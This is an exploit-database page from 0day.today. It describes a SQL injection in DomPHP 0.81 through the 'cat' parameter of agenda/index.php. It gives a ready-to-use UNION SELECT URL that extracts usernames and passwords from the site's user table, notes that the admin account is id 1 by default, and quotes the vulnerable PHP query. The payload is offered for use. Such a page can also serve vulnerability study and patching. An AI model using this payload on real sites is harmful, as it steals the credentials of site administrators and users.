[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DomPHP 0.81 (index.php cat) Remote SQL Injection Vulnerability

Author
MhZ91
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2481
Category
web applications
Date add
11-01-2008
Platform
unsorted
==============================================================
DomPHP 0.81 (index.php cat) Remote SQL Injection Vulnerability
==============================================================



--==+================================================================================+==--
--==+		         DomPHP v0.81 Remote Sql Injection                           +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: DomPHP v0.81 Remote Sql Injection
 Download: http://www.domphp.com
 Bug: Remote Sql Injection
 Info: DomPHP est un outil de publication entierement modulable et surtout completement personnalisable ! Ideal pour les experts mais aussi pour les novices desireux de presenter un site de qualite, vous allez creer votre portail ou site web en quelques clics !


[*]----------------------------------------------------------

Exploit:

http://[www.example.com]/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/*

For get the user and password, u must edit [UserId] whit an id number of members. 
The id of admin, is 1 of default. 

Vuln code in /agenda/index.php

[...]

if ($_GET['cat']) {
	$cat = $_GET['cat'];

	if (!$nomcat) {
	$requete5="select nomCategorie from ".$extension."sortircat where id_categorie=$cat";
	$result5=mysql_query($requete5, $link);
	$recherchenomcat=mysql_fetch_object($result5);
        $nomcat = stripslashes($recherchenomcat->nomCategorie);
	}
[...]

There is other more sql injection... 

[*]----------------------------------------------------------



#  0day.today [2024-10-06]  #